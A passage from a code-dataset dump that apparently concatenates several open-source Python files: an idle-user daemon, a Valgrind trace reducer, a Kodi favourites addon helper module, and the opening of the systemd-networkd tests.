        time = PROCS[info][0]
        print ("USER: %s --> DEVICE: %s --> IDLE TIME: %s" % (user, dev, time))
    print "---------------------------------------------------------"
    print " <<< PROCESSES OF IDLE USERS: >>>\n"
    for info in PROCS.keys():
        user = info.split(',')[0]
        dev = info.split(',')[1]
        pro = PROCS[info][1]
        print ("USER: %s --> DEVICE: %s --> PROCESSES: %s" % (user , dev, pro))
    print "---------------------------------------------------------"
    print "<<< GRACE: USERS THAT WILL (eventually) BE KICKED OUT >>>\n"
    for info in ybann.keys():
        user = info.split(',')[0]
        dev = info.split(',')[1]
        gra = ybann[info]
        print ("USER: %s --> DEVICE: %s --> GRACE MINUTE: %s" % (user, dev, gra))
    print "\n#########################################################"
    print " <<< Sleeping for 60 seconds >>> "
    print "#########################################################\n"
#### End of prinfo ####
###########
# MAIN #
###########
def main():
    """
    Main function.

    Polls finger every 60 seconds, re-reads the config every 30 cycles,
    and hands the idle-session table to compute(). Any unhandled signal
    or exception terminates the loop.
    """
    try:
        count = 1
        # Just at the beginning to get positions in finger.
        #These positions changes between distros.
        (id_pos, name_pos, dev_pos) = get_pos()
        while True:
            if count == 30:
                count = 1
                # Read conf file at start and every 30 minutes
                get_info(LOG_FLAG)
            else:
                count = count + 1
            PROCS = get_pids(id_pos, name_pos, dev_pos)
            try:
                compute(PROCS)
            except Exception, err:
                warning("%s -> %s " % (err.__class__ , err))
            if PRINTINFO == 1:
                prinfo(PROCS, USR_BY_NAME, GROUP_BY_NAME, NO_BANN, BANN, smtp)
            sleep(60) # Sleep for 60 seconds
    except:
        # Bare except: also catches KeyboardInterrupt/SystemExit on shutdown.
        print "Signal caught. Exiting!"
        sys.exit(1)
#### End of MAIN :) ####
# Entry point: parse config, then daemonise with the classic double fork
# (unless running in debug mode, which stays in the foreground).
if __name__ == "__main__":
    try:
        sys.path.append('/etc/idleout')
        LOG_FLAG = 0
        pidfile = get_info(LOG_FLAG)
    except Exception, err:
        print ("%s -> %s " % (err.__class__ , err))
        sys.exit(1)
    info("<<< Starting Idleout daemon >>>")
    try:
        import psyco # try to speed up :)
        psyco.full()
    except ImportError:
        info("Psyco is not installed, the program will just run a bit slower")
        pass
    if PRINTINFO == 1:
        info("<<< Idleout daemon started in debug mode >>>")
        main()
    else:
        # First fork: detach from the launching shell.
        try:
            pid = os.fork()
            if pid > 0:
                sys.exit(0) # exit first parent
        except OSError, e:
            print >> sys.stderr, "fork 1 failed: %d (%s)" % (e.errno, e.strerror)
            fatal("I was unable to fork into a deamon")
            sys.exit(1)
        # Detach from the filesystem, session and umask of the parent.
        try:
            os.chdir("/")
        except Exception, err:
            info("%s -> %s " % (err.__class__ , err))
            pass
        try:
            os.setsid()
        except Exception, err:
            info("%s -> %s " % (err.__class__ , err))
            pass
        try:
            os.umask(0)
        except Exception, err:
            info("%s -> %s " % (err.__class__ , err))
            pass
        # Second fork: the intermediate parent records the daemon's pid.
        try:
            pid = os.fork()
            if pid > 0:
                myfile = open(pidfile, 'w')
                myfile.write(str(pid) + '\n')
                myfile.close()
                info("<<< Idleout daemon started - Pid: %s >>>" % str(pid))
                sys.exit(0)
        except OSError, err:
            print >> sys.stderr, "fork 2 failed: %d: %s" % (err.errno, err.strerror)
            fatal("I was unable to fork into a deamon")
            sys.exit(1)
        # Start the daemon
        main()
| marcosmoyano/idleout | src/idleoutd.py | Python | gpl-2.0 | 22,171 |
#!/usr/bin/python
# This program processes an address trace generated by the Valgrind lackey tool
# to create a reduced trace according to the Fastslim-Demand algorithm
# described in "FastSlim: prefetch-safe trace reduction for I/O cache
# simulation" by Wei Jin, Xiaobai Sun, and Jeffrey S. Chase in ACM Transactions
# on Modeling and Computer Simulation, Vol. 11, No. 2 (April 2001),
# pages 125-160. http://doi.acm.org/10.1145/384169.384170
import fileinput
import sys
import argparse
from operator import attrgetter
class TraceItem(object):
    """One reference in the trace: an access type, a page number and a timestamp.

    Equality and hashing consider only the page number, so a set of
    TraceItem objects behaves as a set of pages.
    """

    def __init__(self, reftype, pg, tstamp):
        self.reftype = reftype   # reference type string from the trace (e.g. 'I', 'L', 'S')
        self.pg = pg             # virtual page number (byte address / 4096)
        self.tstamp = tstamp     # position of this reference in the original trace
        self.marked = False      # set when the page is re-referenced while buffered

    def __eq__(self, other):
        return self.pg == other.pg

    def __hash__(self):
        return hash(self.pg)

    def __repr__(self):
        # Render the page back as a hexadecimal byte address.
        return "%s %x" % (self.reftype, self.pg * 4096)
ts = 0 # "timestamp" (entry number in original trace)
tracebuffer = set() # The set of entries in the buffer
toprint = [] # The list of entries waiting to be printed in order
# Emit in timestamp order may have to hold onto items until the trace buffer
# is emptied, because there may be marked items in the trace buffer with
# earlier timestamps that have to appear in the output first.
# So, we put entries into a list as they are first seen and then
# emit_marked adds all marked items to the list.
# The list is then sorted by timestamp and printed.
def emit_marked_in_ts_order():
    """Flush the trace buffer: print pending and marked entries in
    timestamp order, then reset both the buffer and the pending list."""
    # Pull marked survivors out of the buffer so they are printed too.
    for ti in tracebuffer:
        if ti.marked:
            toprint.append(ti)
    toprint.sort(key=attrgetter('tstamp'))
    for ti in toprint:
        print ti
    tracebuffer.clear()
    del toprint[:]
# Parse command line arguments
# Parse command line options, then stream the Valgrind lackey trace and
# apply the Fastslim-Demand reduction with a small trace buffer.
parser = argparse.ArgumentParser(description="Reduce address trace from valgrind using fastslim-demand algorithm.")
parser.add_argument('-k', '--keepcode', action='store_true', help="include code pages in compressed trace")
parser.add_argument('-b', '--buffersize', type=int, default=4, help="number of entries in trace buffer")
parser.add_argument('tracefile', nargs='?', default="-")
args = parser.parse_args()
# Process input trace
for line in fileinput.input(args.tracefile):
    # Skip valgrind banner lines.
    if line[0] == '=':
        continue
    reftype = line[0:2].strip()
    # Instruction fetches are dropped unless --keepcode was given.
    if reftype == "I" and args.keepcode == False:
        continue
    addrstr = line.split(',')[0][3:].strip()
    try:
        addr = int(addrstr, 16)
    except ValueError:
        #print "This does not appear to be valgrind output, skipping: " + line
        continue
    # Page number; Python 2 integer division (4 KiB pages).
    pg = addr / 4096
    ti = TraceItem(reftype,pg,ts)
    if ti in tracebuffer:
        # Re-reference while buffered: mark it and refresh its timestamp.
        ti.marked = True
        ti.tstamp = ts
    else:
        # Buffer full: flush before admitting the new page.
        if (len(tracebuffer) == args.buffersize):
            emit_marked_in_ts_order()
        toprint.append(ti)
        tracebuffer.add(ti)
    ts = ts + 1
| 2nd47/UofT-Projects | CSC369/Virtual Memory/traceprogs/fastslim.py | Python | gpl-2.0 | 2,771 |
#
# Copyright (C) 2014-2015
# Sean Poyser (seanpoyser@gmail.com)
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import xbmc
import xbmcaddon
import xbmcgui
import os
import re
import sfile
def GetXBMCVersion():
    """Return the running Kodi version as an (int major, int minor) tuple.

    Reads the version string (e.g. '13.9.902') of the 'xbmc.addon'
    pseudo-addon rather than using a JSON-RPC round trip.
    """
    parts = xbmcaddon.Addon('xbmc.addon').getAddonInfo('version').split('.')
    return int(parts[0]), int(parts[1]) #major, minor eg, 13.9.902
# Addon identity and filesystem roots.
ADDONID = 'plugin.program.super.favourites'
ADDON = xbmcaddon.Addon(ADDONID)
HOME = ADDON.getAddonInfo('path')
ROOT = ADDON.getSetting('FOLDER')
# Fall back to the default profile folder when no custom folder is set.
if not ROOT:
    ROOT = 'special://profile/addon_data/plugin.program.super.favourites/'
# User-configurable behaviour flags.
SHOWXBMC = ADDON.getSetting('SHOWXBMC') == 'true'
INHERIT = ADDON.getSetting('INHERIT') == 'true'
ALPHA_SORT = ADDON.getSetting('ALPHA_SORT') == 'true'
LABEL_NUMERIC = ADDON.getSetting('LABEL_NUMERIC') == 'true'
LABEL_NUMERIC_QL = ADDON.getSetting('LABEL_NUMERIC_QL') == 'true'
PROFILE = os.path.join(ROOT, 'Super Favourites')
VERSION = ADDON.getAddonInfo('version')
ICON = os.path.join(HOME, 'icon.png')
FANART = os.path.join(HOME, 'fanart.jpg')
SEARCH = os.path.join(HOME, 'resources', 'media', 'search.png')
GETTEXT = ADDON.getLocalizedString
TITLE = GETTEXT(30000)
DISPLAYNAME = 'Kodi'
NUMBER_SEP = ' | '
# Media extensions Kodi can play directly (zip archives excluded).
PLAYABLE = xbmc.getSupportedMedia('video') + '|' + xbmc.getSupportedMedia('music')
PLAYABLE = PLAYABLE.replace('|.zip', '')
PLAYABLE = PLAYABLE.split('|')
# How a favourite is launched.
PLAYMEDIA_MODE = 1
ACTIVATEWINDOW_MODE = 2
RUNPLUGIN_MODE = 3
ACTION_MODE = 4
HOMESPECIAL = 'special://home/'
HOMEFULL = xbmc.translatePath(HOMESPECIAL)
DEBUG = ADDON.getSetting('DEBUG') == 'true'
# Keymap file names installed into the user's keymaps folder.
KEYMAP_HOT = 'super_favourites_hot.xml'
KEYMAP_MENU = 'super_favourites_menu.xml'
# Kodi release detection (a .9 minor marks a pre-release of the next major).
MAJOR, MINOR = GetXBMCVersion()
FRODO = (MAJOR == 12) and (MINOR < 9)
GOTHAM = (MAJOR == 13) or (MAJOR == 12 and MINOR == 9)
HELIX = (MAJOR == 14) or (MAJOR == 13 and MINOR == 9)
ISENGARD = (MAJOR == 15) or (MAJOR == 14 and MINOR == 9)
KRYPTON = (MAJOR == 17) or (MAJOR == 16 and MINOR == 9)
ESTUARY = xbmc.getCondVisibility('System.HasAddon(%s)' % 'skin.estuary') == 1
FILENAME = 'favourites.xml'
FOLDERCFG = 'folder.cfg'
def Log(text):
    """Backwards-compatible alias for log()."""
    log(text)
def log(text):
    """Write a tagged message to the Kodi log.

    Logged at NOTICE level when the addon's DEBUG setting is on, otherwise
    at LOGDEBUG. Best-effort: any failure is swallowed deliberately.
    """
    try:
        output = '%s V%s : %s' % (TITLE, VERSION, str(text))
        if DEBUG:
            xbmc.log(output)
        else:
            xbmc.log(output, xbmc.LOGDEBUG)
    except:
        pass
def DialogOK(line1, line2='', line3=''):
    """Show a modal OK dialog titled with the addon name and version."""
    d = xbmcgui.Dialog()
    d.ok(TITLE + ' - ' + VERSION, line1, line2 , line3)
def DialogYesNo(line1, line2='', line3='', noLabel=None, yesLabel=None):
    """Show a modal yes/no dialog; return True when the user accepts.

    Custom button labels are used only when BOTH noLabel and yesLabel
    are supplied.
    """
    heading = TITLE + ' - ' + VERSION
    dialog = xbmcgui.Dialog()
    if noLabel is None or yesLabel is None:
        answer = dialog.yesno(heading, line1, line2, line3)
    else:
        answer = dialog.yesno(heading, line1, line2, line3, noLabel, yesLabel)
    return answer == True
def Progress(title, line1 = '', line2 = '', line3 = ''):
    """Create, show (at 0%) and return a progress dialog; caller closes it."""
    dp = xbmcgui.DialogProgress()
    dp.create(title, line1, line2, line3)
    dp.update(0)
    return dp
def generateMD5(text):
    """Return the hex MD5 digest of *text*.

    Returns '' for empty/falsy input and the sentinel '0' when no MD5
    implementation can digest the value (e.g. neither hashlib nor the
    legacy md5 module is usable).
    """
    if not text:
        return ''

    # Preferred: the modern hashlib interface.
    try:
        from hashlib import md5 as _digest
        return _digest(text).hexdigest()
    except:
        pass

    # Fallback for ancient interpreters that only ship the md5 module.
    try:
        from md5 import new as _digest
        return _digest(text).hexdigest()
    except:
        pass

    return '0'
def LaunchSF():
    """Open the Super Favourites plugin root in Kodi's Videos window."""
    xbmc.executebuiltin('ActivateWindow(videos,plugin://%s)' % ADDONID)
def CheckVersion():
    """Run one-time migration steps after an addon upgrade.

    Compares the stored VERSION setting with the current one; on change it
    re-verifies search faves, settings and zip leftovers, renames the old
    cache folder, stores the new version and shows the changelog.
    Best-effort: all failures are swallowed.
    """
    try:
        prev = ADDON.getSetting('VERSION')
        curr = VERSION
        if prev == curr:
            return
        verifySuperSearch()
        VerifySettinngs()
        VerifyZipFiles()
        # 'cache' was renamed to 'C' in a later release.
        src = os.path.join(ROOT, 'cache')
        dst = os.path.join(ROOT, 'C')
        sfile.rename(src, dst)
        ADDON.setSetting('VERSION', curr)
        # Fresh installs get their profile folder created.
        if prev == '0.0.0' or prev == '1.0.0':
            sfile.makedirs(PROFILE)
        #call showChangeLog like this to workaround bug in openElec
        script = os.path.join(HOME, 'showChangelog.py')
        cmd = 'AlarmClock(%s,RunScript(%s),%d,True)' % ('changelog', script, 0)
        xbmc.executebuiltin(cmd)
    except:
        pass
def VerifyZipFiles():
    """Remove temp zip artefacts that a crashed backup/restore left behind."""
    #cleanup corrupt zip files
    sfile.remove(os.path.join('special://userdata', '_sf_temp.zip'))
    sfile.remove(os.path.join('special://userdata', 'SF_Temp'))
def VerifySettinngs():
    """Migrate settings whose type or meaning changed between releases.

    (Name typo is kept: external callers reference 'VerifySettinngs'.)
    """
    #patch any settings that have changed types or values
    if ADDON.getSetting('DISABLEMOVIEVIEW') == 'true':
        ADDON.setSetting('DISABLEMOVIEVIEW', 'false')
        ADDON.setSetting('CONTENTTYPE', '')
def verifySuperSearch():
    """Install/refresh the Super Search favourites folder.

    Renames the legacy 'Search' folder to 'S', seeds it from the bundled
    favourites.xml on first run, patches renamed plugin actions in the
    existing file, and merges in any favourites added upstream.
    """
    old = os.path.join(ROOT, 'Search')
    dst = os.path.join(ROOT, 'S')
    sfile.rename(old, dst)
    try: sfile.makedirs(dst)
    except: pass
    src = os.path.join(HOME, 'resources', 'search', FILENAME)
    dst = os.path.join(dst, FILENAME)
    if not sfile.exists(dst):
        sfile.copy(src, dst)
    try:
        #patch any changes
        xml = sfile.read(dst)
        xml = xml.replace('is/?action=movies_search&', 'is/?action=movieSearch&')
        xml = xml.replace('is/?action=people_movies&', 'is/?action=moviePerson&')
        xml = xml.replace('is/?action=shows_search&', 'is/?action=tvSearch&')
        xml = xml.replace('is/?action=people_shows&', 'is/?action=tvPerson&')
        f = sfile.file(dst, 'w')
        f.write(xml)
        f.close()
    except:
        pass
    import favourite
    # Merge any bundled favourites the user's file doesn't have yet.
    new = favourite.getFavourites(src, validate=False)
    #line1 = GETTEXT(30123)
    #line2 = GETTEXT(30124)
    for item in new:
        fave, index, nFaves = favourite.findFave(dst, item[2])
        if index < 0:
            #line = line1 % item[0]
            #if DialogYesNo(line1=line, line2=line2):
            favourite.addFave(dst, item)
def UpdateKeymaps():
    """Regenerate the addon's keymap files after a settings change."""
    # A programmable hotkey manages its own keymap; drop ours otherwise.
    if ADDON.getSetting('HOTKEY') != GETTEXT(30111): #i.e. not programmable
        DeleteKeymap(KEYMAP_HOT)
    DeleteKeymap(KEYMAP_MENU)
    VerifyKeymaps()
def DeleteKeymap(map):
    """Delete the named keymap file from the user's keymaps folder."""
    path = os.path.join('special://profile/keymaps', map)
    DeleteFile(path)
def DeleteFile(path):
    """Remove *path*, retrying up to 5 times (the file may be locked briefly)."""
    tries = 5
    while sfile.exists(path) and tries > 0:
        tries -= 1
        try:
            sfile.remove(path)
        except:
            # Back off and retry; failures after the last try are ignored.
            xbmc.sleep(500)
def verifyLocation():
    """Reset the FOLDER setting when it still points at the default profile.

    Works around an Android bug in the browse-folder dialog that stores
    the default path explicitly.
    """
    #if still set to default location reset, to workaround
    #Android bug in browse folder dialog
    location = ADDON.getSetting('FOLDER')
    profile = 'special://profile/addon_data/plugin.program.super.favourites/'
    userdata = 'special://userdata/addon_data/plugin.program.super.favourites/'
    if (location == profile) or (location == userdata):
        ADDON.setSetting('FOLDER', '')
def verifyPlugins():
    """Ensure the 'Plugins' folder exists under the addon's data root."""
    folder = os.path.join(ROOT, 'Plugins')
    if sfile.exists(folder):
        return
    try: sfile.makedirs(folder)
    except: pass
def VerifyKeymaps():
    """Install the hotkey/context keymaps and the capture launcher script,
    reloading Kodi's keymaps only when something actually changed."""
    reload = False
    scriptPath = ADDON.getAddonInfo('profile')
    scriptPath = os.path.join(scriptPath, 'captureLauncher.py')
    if not sfile.exists(scriptPath):
        DeleteKeymap(KEYMAP_MENU) #ensure gets updated to launcher version
        src = os.path.join(HOME, 'captureLauncher.py')
        sfile.copy(src, scriptPath)
    if VerifyKeymapHot():
        reload = True
    if VerifyKeymapMenu():
        reload = True
    if not reload:
        return
    xbmc.sleep(1000)
    xbmc.executebuiltin('Action(reloadkeymaps)')
def VerifyKeymapHot():
    """Write the global-hotkey keymap when needed; return True if keymaps
    must be reloaded."""
    if ADDON.getSetting('HOTKEY') == GETTEXT(30111): #i.e. programmable
        return False
    dest = os.path.join('special://profile/keymaps', KEYMAP_HOT)
    if sfile.exists(dest):
        return False
    key = ADDON.getSetting('HOTKEY')
    # Only keys from the localized list 30028-30039 (plus 30058) are valid.
    valid = []
    for i in range(30028, 30040):
        valid.append(GETTEXT(i))
    valid.append(GETTEXT(30058))
    includeKey = key in valid
    if not includeKey:
        DeleteKeymap(KEYMAP_HOT)
        return True
    if isATV():
        # AppleTV 2 cannot use keyboard keymaps.
        DialogOK(GETTEXT(30118), GETTEXT(30119))
        return False
    return WriteKeymap(key.lower(), key.lower())
def WriteKeymap(start, end):
    """Write the hotkey keymap XML binding <start>...</end> to hot.py.

    Retries the write a few times because the virtual filesystem can lag;
    always returns True (callers then reload keymaps).
    """
    dest = os.path.join('special://profile/keymaps', KEYMAP_HOT)
    cmd = '<keymap><Global><keyboard><%s>XBMC.RunScript(special://home/addons/plugin.program.super.favourites/hot.py)</%s></keyboard></Global></keymap>' % (start, end)
    f = sfile.file(dest, 'w')
    f.write(cmd)
    f.close()
    xbmc.sleep(1000)
    tries = 4
    while not sfile.exists(dest) and tries > 0:
        tries -= 1
        f = sfile.file(dest, 'w')
        f.write(cmd)
        f.close()
        xbmc.sleep(1000)
    return True
def VerifyKeymapMenu():
    """Install (or remove) the context-menu keymap.

    Returns True when the keymaps must be reloaded, False otherwise.
    """
    if ADDON.getSetting('CONTEXT') != 'true':
        DeleteKeymap(KEYMAP_MENU)
        return True
    keymapDir = 'special://profile/keymaps'
    dst = os.path.join(keymapDir, KEYMAP_MENU)
    if sfile.exists(dst):
        return False
    src = os.path.join(HOME, 'resources', 'keymaps', KEYMAP_MENU)
    sfile.makedirs(keymapDir)
    sfile.copy(src, dst)
    return True
def verifyPlayMedia(cmd):
    # PlayMedia commands are always treated as valid - there is no addon
    # reference to check, unlike verifyPlugin/verifyScript below.
    return True
def verifyPlugin(cmd):
    """True when the plugin:// addon referenced by *cmd* is installed.

    Commands that do not reference a plugin are assumed to be valid.
    """
    try:
        addonId = re.compile('plugin://(.+?)/').search(cmd).group(1)
        return xbmc.getCondVisibility('System.HasAddon(%s)' % addonId) == 1
    except:
        pass
    return True
def verifyScript(cmd):
    """True when the addon referenced by a RunScript-style *cmd* is installed.

    Commands whose addon id cannot be parsed are assumed to be valid.
    """
    try:
        addonId = cmd.split('(', 1)[1].split(',', 1)[0].replace(')', '').replace('"', '')
        addonId = addonId.split('/', 1)[0]
        return xbmc.getCondVisibility('System.HasAddon(%s)' % addonId) == 1
    except:
        pass
    return True
def isATV():
    # True when Kodi/XBMC reports it is running on an Apple TV 2.
    return xbmc.getCondVisibility('System.Platform.ATV2') == 1
def GetFolder(title):
    """Show a browse-for-folder dialog.

    Returns the chosen folder, or None when the user left it at the
    default location (ROOT).
    """
    sfile.makedirs(PROFILE)
    choice = xbmcgui.Dialog().browse(3, title, 'files', '', False, False, ROOT)
    return None if choice == ROOT else choice
# Map of the five XML special characters to their predefined entities.
# NOTE: the previous table mapped every character to itself (the entity
# text had been lost to markup rendering), which made escape() a no-op.
html_escape_table = {
    "&": "&amp;",
    '"': "&quot;",
    "'": "&apos;",
    ">": "&gt;",
    "<": "&lt;",
}
def escape(text):
    """Return *text* with the five XML special characters entity-escaped."""
    return str(''.join(html_escape_table.get(c,c) for c in text))
def unescape(text):
    """Reverse escape(): convert the five XML entities back to characters.

    NOTE: the previous body replaced each entity with itself (the entity
    text had been lost to markup rendering), making this a no-op.
    '&amp;' is translated last so that sequences such as '&amp;lt;' are
    not double-unescaped.
    """
    text = text.replace('&quot;', '"')
    text = text.replace('&apos;', '\'')
    text = text.replace('&gt;', '>')
    text = text.replace('&lt;', '<')
    text = text.replace('&amp;', '&')
    return text
def fix(text):
    """Drop all non-ASCII characters and strip surrounding whitespace."""
    ascii_only = ''.join(ch for ch in text if ord(ch) < 128)
    return ascii_only.strip()
def Clean(name):
    """Clean a display name: remove '(1234)'-style runs, strip '[...]'
    formatting elements, and collapse repeated spaces."""
    import re
    # drop any parenthesised run of digits, e.g. '(2012)'
    name = re.sub('\([0-9)]*\)', '', name)
    cleaned = ''
    for chunk in name.split(']'):
        if not chunk:
            continue
        # re-attach the ']' split off above, then drop the whole element
        cleaned += re.sub('\[[^)]*\]', '', chunk + ']')
    cleaned = cleaned.replace('[', '').replace(']', '').strip()
    # collapse runs of spaces down to single spaces
    previous = None
    while previous != len(cleaned):
        previous = len(cleaned)
        cleaned = cleaned.replace('  ', ' ')
    return cleaned.strip()
def CleanForSort(text):
    """Build a sort key: lower-case and Clean() the first element of *text*."""
    return Clean(text[0].lower())
def fileSystemSafe(text):
    """Strip characters that are illegal in file names.

    Returns the cleaned text, or None when nothing usable remains.
    """
    if not text:
        return None
    stripped = re.sub('[:\\\\/*?\<>|"]+', '', text).strip()
    return stripped if stripped else None
def findAddon(item):
    """Extract an addon id from *item* (quoted or plugin://-style).

    Returns the id, or None when it cannot be parsed or is not installed.
    """
    try:
        try:
            addonId = re.compile('"(.+?)"').search(item).group(1)
        except:
            addonId = item
        addonId = addonId.replace('plugin://', '').replace('script://', '').replace('/', '')
        addonId = addonId.split('?', 1)[0]
        if xbmc.getCondVisibility('System.HasAddon(%s)' % addonId) == 0:
            return None
        return addonId
    except:
        return None
def getSettingsLabel(addon):
    """Build the 'open settings' label for *addon*.

    Falls back to a generic label when the addon name is empty.
    """
    label = fix(xbmcaddon.Addon(addon).getAddonInfo('name')).strip()
    try:
        if len(label) > 0:
            return GETTEXT(30094) % label
    except:
        pass
    return GETTEXT(30094) % GETTEXT(30217)
#logic for setting focus inspired by lambda
def openSettings(addonID, focus=None):
    """Open an addon's settings dialog, optionally focusing a control.

    focus is a dotted pair like '1.2' (presumably category.setting - confirm
    against callers); the control-id offsets differ between Frodo and later
    Kodi versions, hence the two branches below.
    """
    if not focus:
        return xbmcaddon.Addon(addonID).openSettings()
    try:
        xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonID)
        value1, value2 = str(focus).split('.')
        if FRODO:
            xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 200))
            xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 100))
        else:
            xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
            xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
    except:
        return
#Remove Tags method from
#http://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
# Non-greedy match for anything that looks like an HTML/XML tag.
TAG_RE = re.compile('<.*?>')
def RemoveTags(html):
    """Return *html* with all <...> tag markup stripped out."""
    return TAG_RE.sub('', html)
def showBusy():
    """Open the busy-spinner dialog.

    Returns the dialog so the caller can close it, or None on failure.
    """
    try:
        import xbmcgui
        dialog = xbmcgui.WindowXMLDialog('DialogBusy.xml', '')
        dialog.show()
        try:
            dialog.getControl(10).setVisible(False)
        except:
            pass
        return dialog
    except:
        return None
def showText(heading, text, waitForClose=False):
    """Display *text* in Kodi's text-viewer window (window id 10147).

    Retries filling in the controls while the window is still opening;
    optionally blocks until the user closes the window.
    """
    windowId = 10147
    xbmc.executebuiltin('ActivateWindow(%d)' % windowId)
    xbmc.sleep(100)
    win = xbmcgui.Window(windowId)
    attempts = 50
    while attempts > 0:
        try:
            xbmc.sleep(10)
            win.getControl(1).setLabel(heading)
            win.getControl(5).setText(text)
            break
        except:
            attempts -= 1
    if waitForClose:
        while xbmc.getCondVisibility('Window.IsVisible(%d)' % windowId) == 1:
            xbmc.sleep(50)
def showChangelog(addonID=None):
    """Show the changelog of *addonID* (or of this addon) in the text viewer."""
    try:
        addon = xbmcaddon.Addon(addonID if addonID else ADDONID)
        text = sfile.read(addon.getAddonInfo('changelog'))
        title = '%s - %s' % (xbmc.getLocalizedString(24054), addon.getAddonInfo('name'))
        showText(title, text)
    except:
        pass
def getAllPlayableFiles(folder):
    """Map path -> [path, size] for every playable file below *folder*."""
    found = {}
    _getAllPlayableFiles(folder, found)
    return found
def _getAllPlayableFiles(folder, theFiles):
    """Recursive worker for getAllPlayableFiles; fills *theFiles* in place."""
    current, dirs, files = sfile.walk(folder)
    for name in dirs:
        _getAllPlayableFiles(os.path.join(current, name), theFiles)
    for name in files:
        path = os.path.join(current, name)
        if isPlayable(path):
            theFiles[path] = [path, sfile.size(path)]
def isFilePlayable(path):
    """True when the file's extension is in the PLAYABLE list."""
    try:
        return '.' + sfile.getextension(path) in PLAYABLE
    except:
        return False
def isPlayable(path):
    """True when *path* is a playable file, or a folder that (recursively)
    contains at least one playable file."""
    if not sfile.exists(path):
        return False
    if sfile.isfile(path):
        return isFilePlayable(path)
    current, dirs, files = sfile.walk(path)
    for name in files:
        if isPlayable(os.path.join(current, name)):
            return True
    for name in dirs:
        if isPlayable(os.path.join(current, name)):
            return True
    return False
def parseFolder(folder, subfolders=True):
    """List playable entries of *folder* as [name, path, isFile] triples.

    Sub-folders are listed first (when *subfolders* is True), then files.
    """
    entries = []
    current, dirs, files = sfile.walk(folder)
    if subfolders:
        for name in dirs:
            path = os.path.join(current, name)
            if isPlayable(path):
                entries.append([name, path, False])
    for name in files:
        path = os.path.join(current, name)
        if isPlayable(path):
            entries.append([name, path, True])
    return entries
def getPrefix(index):
    """Return (prefix, index+1) where prefix is the zero-padded, 1-based
    index followed by NUMBER_SEP."""
    index += 1
    prefix = '%s%s' % (index, NUMBER_SEP)
    if index < 10:
        prefix = '0' + prefix
    return prefix, index
def addPrefixToLabel(index, label, addPrefix=None):
    """Insert a numeric prefix ('01<sep>', ...) into *label*.

    Any leading '[...]' formatting elements are skipped so the prefix lands
    on the first visible character of the label.

    Args:
        index: zero-based position; the returned index is advanced (1-based).
        label: the label text, possibly starting with '[...]' elements.
        addPrefix: force prefixing on/off; defaults to LABEL_NUMERIC.

    Returns:
        (label, index) with the prefix inserted and the index advanced.
    """
    if addPrefix is None:
        addPrefix = LABEL_NUMERIC
    if not addPrefix:
        return label, index
    prefix, index = getPrefix(index)
    locn = -1
    SEARCHING = 0
    INELEMENT = 1
    BODY = 2
    mode = SEARCHING
    for c in label:
        locn += 1
        if mode == SEARCHING:
            # FIX: the original compared with "c is '['", which relies on
            # CPython string interning; use equality for correct comparison.
            if c == '[':
                mode = INELEMENT
            else:
                mode = BODY
        elif mode == INELEMENT:
            if c == ']':
                mode = SEARCHING
        if mode == BODY:
            break
    label = label[:locn] + prefix + label[locn:]
    return label, index
def playItems(items, id=-1):
    """Queue [title, url(, icon)] entries into the video playlist.

    When id >= 0 the first item is handed back via setResolvedUrl (plugin
    invocation); when id == -1 the playlist is played directly.
    """
    if items == None or len(items) < 1:
        return
    pl = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
    pl.clear()
    resolved = False
    for item in items:
        title = item[0]
        url = item[1]
        # optional third element is the icon; fall back to the addon icon
        if len(item) > 2:
            iconImage = item[2]
        else:
            iconImage = ICON
        liz = xbmcgui.ListItem(title, iconImage=iconImage, thumbnailImage=iconImage)
        liz.setInfo(type='Video', infoLabels={'Title':title})
        pl.add(url, liz)
        # resolve only once, for the first queued item
        if id >= 0 and (not resolved):
            import xbmcplugin
            resolved = True
            xbmcplugin.setResolvedUrl(id, True, liz)
    if id == -1:
        xbmc.Player().play(pl)
def convertToHome(text):
    """Rewrite an absolute home path in *text* to its special:// form."""
    if not text.startswith(HOMEFULL):
        return text
    return text.replace(HOMEFULL, HOMESPECIAL)
# This module is import-only; there is no standalone entry point.
if __name__ == '__main__':
    pass
#!/usr/bin/env python3
# SPDX-License-Identifier: LGPL-2.1+
# systemd-networkd tests
import argparse
import os
import re
import shutil
import signal
import subprocess
import sys
import time
import unittest
from shutil import copytree
# Paths used by the tests (all under /run or /proc, gone after reboot).
network_unit_file_path='/run/systemd/network'
networkd_runtime_directory='/run/systemd/netif'
networkd_ci_path='/run/networkd-ci'
network_sysctl_ipv6_path='/proc/sys/net/ipv6/conf'
network_sysctl_ipv4_path='/proc/sys/net/ipv4/conf'
# dnsmasq artifacts created by start_dnsmasq() below.
dnsmasq_pid_file='/run/networkd-ci/test-test-dnsmasq.pid'
dnsmasq_log_file='/run/networkd-ci/test-dnsmasq-log-file'
# Prefer binaries shipped with the systemd installation over plain $PATH.
systemd_lib_paths=['/usr/lib/systemd', '/lib/systemd']
which_paths=':'.join(systemd_lib_paths + os.getenv('PATH', os.defpath).lstrip(':').split(':'))
networkd_bin=shutil.which('systemd-networkd', path=which_paths)
resolved_bin=shutil.which('systemd-resolved', path=which_paths)
wait_online_bin=shutil.which('systemd-networkd-wait-online', path=which_paths)
networkctl_bin=shutil.which('networkctl', path=which_paths)
resolvectl_bin=shutil.which('resolvectl', path=which_paths)
timedatectl_bin=shutil.which('timedatectl', path=which_paths)
# Runtime flags consumed by setUpModule (presumably overridden via the
# argparse options handled in __main__ - confirm there).
use_valgrind=False
enable_debug=True
env = {}
asan_options=None
lsan_options=None
ubsan_options=None
# Units stopped by setUpModule and restarted by tearDownModule.
running_units = []
def check_output(*command, **kwargs):
    """Run *command* and return its stripped stdout.

